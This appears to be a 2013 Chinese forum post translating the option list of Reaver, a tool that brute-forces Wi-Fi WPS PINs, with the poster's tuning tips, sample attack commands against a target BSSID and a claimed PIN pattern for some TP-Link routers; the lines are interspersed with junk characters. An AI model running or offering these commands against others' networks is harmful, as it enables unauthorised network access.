中尉
- 注册时间
- 2013-4-18
- 金币
- 378 个
- 威望
- 1 个
- 荣誉
- 0 个
累计签到:27 天
连续签到:0 天
[LV.50]初入江湖
|
$ j% P4 N+ o; z! U8 @) z-i, --interface=<wlan> Name of the monitor-mode interface to use
) O, M" n' n2 O( ~ 网卡的监视接口,通常是mon0
1 E+ _4 B4 Z- Q6 {8 x: d2 N -b, --bssid=<mac> BSSID of the target AP" f3 D/ J- ]& m) z! F
AP的MAC地址 ] R( o' E) f% w. c
/ Q. w1 u8 T7 l0 x' u$ c7 ?- P+ i5 o
Optional Arguments:$ K& m0 c( L: D9 C/ e
-m, --mac=<mac> MAC of the host system0 V+ u& m% L+ Y4 T2 a- O$ F
指定本机MAC地址,在AP有MAC过滤的时候需要使用
6 Z: N+ J V* \- T; E+ ` -e, --essid=<ssid> ESSID of the target AP
: P4 w$ e" c) b8 D; h" X9 d6 J 路由器的ESSID,一般不用指定
% U3 U9 Z* W. Z) o0 J -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)2 n% e( G5 h' F4 {# b7 h. W# i3 c
信号的频道,如果不指定会自动扫描
) G3 @% ^0 F# D/ X6 m, @' h. ~ -o, --out-file=<file> Send output to a log file [stdout]7 t! `+ }! |( X. t; Z
标准输出到文件+ q5 R1 s4 U- l o
-s, --session=<file> Restore a previous session file
9 w5 o- C! ]! m 恢复进程文件* r# `7 [% v( ^( j1 ]% g
-C, --exec=<command> Execute the supplied command upon successful pin recovery0 m w) g; n) N6 Y. E! |0 Z
pin成功后执行命令
2 S+ }" A. C3 D -D, --daemonize Daemonize reaver
3 X: F; ~% [9 X$ T# K) | 设置reaver成Daemon
9 G: ?- c% f0 e% I+ |; w/ b -a, --auto Auto detect the best advanced options for the target AP" o; ?2 V, `5 ^* c) Y: J/ A+ @ F
对目标AP自动检测高级参数2 Z6 n* w n5 E" o0 q! U) f7 G
-f, --fixed Disable channel hopping- b/ Z P2 x/ d, H4 R, }
禁止频道跳转
: n; |$ l1 j/ G6 s9 ~ -5, --5ghz Use 5GHz 802.11 channels% M' ?8 R9 C% q, X
使用5G频道
. [4 A+ F9 ?8 Z3 t -v, --verbose Display non-critical warnings (-vv for more)
X7 x4 b# b% O 显示不重要警告信息 -vv 可以显示更多
4 s8 S9 p& E" V$ Y4 U6 [ -q, --quiet Only display critical messages1 x% G: j. u! i3 q ^3 s6 F9 @
只显示关键信息
: P* P2 _% j. n" c6 P) r" d1 { -h, --help Show help
- g; {, _; u% y 显示帮助2 Z" P( `0 v& `3 r) M; |8 y
9 d% Y# u% w, ^2 f. X. k/ g- l' \6 p2 k) T6 Z. `
Advanced Options:. g! A9 R5 v$ R4 u2 g% D0 g+ P% U B( h
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
, b" n3 X9 g& S* i5 V9 F9 H) f 直接读取psk(本人测试未成功,建议用网卡自带软件获取)% l! P: y: y8 h; Z( f1 x
-d, --delay=<seconds> Set the delay between pin attempts [1]+ X; z) x9 r6 w) v6 {1 P
pin间延时,默认1秒,推荐设07 ?. _$ E) o1 H+ r+ Y- ?6 I9 K% I" P
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]3 z. [' s5 B p! Y) \# H9 l: i
AP锁定WPS后等待时间! l( O& r. Q0 s6 Q8 U" o1 q4 X
-g, --max-attempts=<num> Quit after num pin attempts
; I$ W. q( c G" `# F 最大pin次数
/ K3 A) x6 W0 S -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]; P* r5 `* p6 `; m* R$ r" y; l
10次意外失败后等待时间,默认0秒6 s6 [+ q4 D" @( p0 b1 j- _* Z4 k |- ]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts# F; B% H! h) q/ [/ j) |; v" B
每x次pin后等待y秒
, v0 J9 C- i/ e -t, --timeout=<seconds> Set the receive timeout period [5]
% q- Q. b- \( [$ h% ? 收包超时,默认5秒
0 W# p# F% O# S+ N -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]. y0 V- y ?! N5 N. h
M5/M7超时,默认0.2秒2 S- \& u3 n# U
-A, --no-associate Do not associate with the AP (association must be done by another application)
]$ q* d* ?! U- }5 L2 F 不连入AP(连入过程必须有其他程序完成)* ]1 c" D. D" B- a0 F- R C. V
-N, --no-nacks Do not send NACK messages when out of order packets are received T2 k3 R7 U0 }) l4 Q
不发送NACK信息(如果一直pin不动,可以尝试这个参数)
) Y% E, |+ n, ?- @- [- d8 z: [ -S, --dh-small Use small DH keys to improve crack speed: V4 b4 @- B; }3 _
使用小DH关键值提高速度(推荐使用)
, j2 r; w! h [5 F) ]0 O -L, --ignore-locks Ignore locked state reported by the target AP& u. Z' P- e0 `$ g9 n
忽略目标AP报告的锁定状态7 \7 l: a) y: ~ E3 H6 N+ T
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
) H' a4 L" v" T8 h* `" D 每当收到EAP失败包就终止WPS进程# m7 a' G X* S
-n, --nack Target AP always sends a NACK [Auto]0 m/ g* X/ p. h( a
对目标AP总是发送NACK,默认自动# T( e! W; ?* H4 ~' t0 I& b* Q R
-w, --win7 Mimic a Windows 7 registrar [False]8 T6 y( C- F: \& H
模拟win7注册,默认关闭
( H! v* H6 F' [7 ?4 }
, R4 ^- o; J1 }% C. Z% b5 h$ P; L------个人心得---------------------------------------------------------
4 [4 a% a O( Y6 Z* t' K0 h
1 m3 z+ u& L0 ^! V对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的; N( c" n' J, A& U
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S
& k. M4 X4 `9 G* O
. e$ @* A) p5 S: t如果一直pin不动,尝试加-N参数
1 W( g, d. A3 N; s5 R% R }5 Hreaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -
9 [6 E" t) f2 a! u5 s6 v8 X$ v% {
6 O$ U1 b* N. p9 ~2 C. ^* d/ g7 g① PIN的是TP-Link是5C:63:BF:XX:XX:XX系列 pin的开头是6开通的 (测试多个确实如此不包含奇葩的)+ u5 j" u. y$ ?4 i: b
|
|
[复制链接]
IP卡
狗仔卡
发表于 2013-3-16 17:16
显身卡
